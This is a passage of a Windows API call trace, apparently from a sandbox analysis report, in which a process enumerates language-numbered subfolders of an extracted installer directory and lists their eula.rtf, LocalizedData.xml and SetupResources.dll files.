dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.135] FindNextFileW (in: hFindFile=0x802598, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x141c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.135] FindNextFileW (in: hFindFile=0x802598, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.135] FindNextFileW (in: hFindFile=0x802598, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.135] FindClose (in: hFindFile=0x802598 | out: hFindFile=0x802598) returned 1 [0169.135] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.135] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0169.135] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.135] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1046\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802018 [0169.136] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.136] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe63, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.136] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13b62, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.137] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.137] FindNextFileW (in: hFindFile=0x802018, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.137] FindClose (in: hFindFile=0x802018 | out: hFindFile=0x802018) returned 1 [0169.137] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.137] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0169.137] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.137] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1049\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802658 [0169.137] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.137] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xd4b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.138] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.138] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.138] FindNextFileW (in: hFindFile=0x802658, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.138] FindClose (in: hFindFile=0x802658 | out: hFindFile=0x802658) returned 1 [0169.138] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.138] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0169.138] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.138] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1053\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8024d8 [0169.139] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.139] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf19, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.140] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12f70, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.140] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.140] FindNextFileW (in: hFindFile=0x8024d8, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.140] FindClose (in: hFindFile=0x8024d8 | out: hFindFile=0x8024d8) returned 1 [0169.140] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.140] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1055", cAlternateFileName="")) returned 1 [0169.140] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.140] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1055\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802458 [0169.141] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.141] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xf13, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.141] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.141] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.141] FindNextFileW (in: hFindFile=0x802458, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.141] FindClose (in: hFindFile=0x802458 | out: hFindFile=0x802458) returned 1 [0169.141] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.141] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2052", cAlternateFileName="")) returned 1 [0169.142] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.142] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2052\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802058 [0169.142] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.142] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0x16c3, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.142] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xed0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.142] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0169.143] FindNextFileW (in: hFindFile=0x802058, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x0, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0169.143] FindClose (in: hFindFile=0x802058 | out: hFindFile=0x802058) returned 1 [0169.143] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3231230 | out: hHeap=0x710000) returned 1 [0169.143] FindNextFileW (in: hFindFile=0x8025d8, lpFindFileData=0x2d6fa7c | out: lpFindFileData=0x2d6fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="2070", cAlternateFileName="")) returned 1 [0169.143] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3231230 [0169.143] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x801f58 [0169.143] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.143] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xfaf, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0169.143] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x1397e, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0169.144] FindNextFileW (in: hFindFile=0x801f58, lpFindFileData=0x2d6f800 | out: lpFindFileData=0x2d6f800*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, 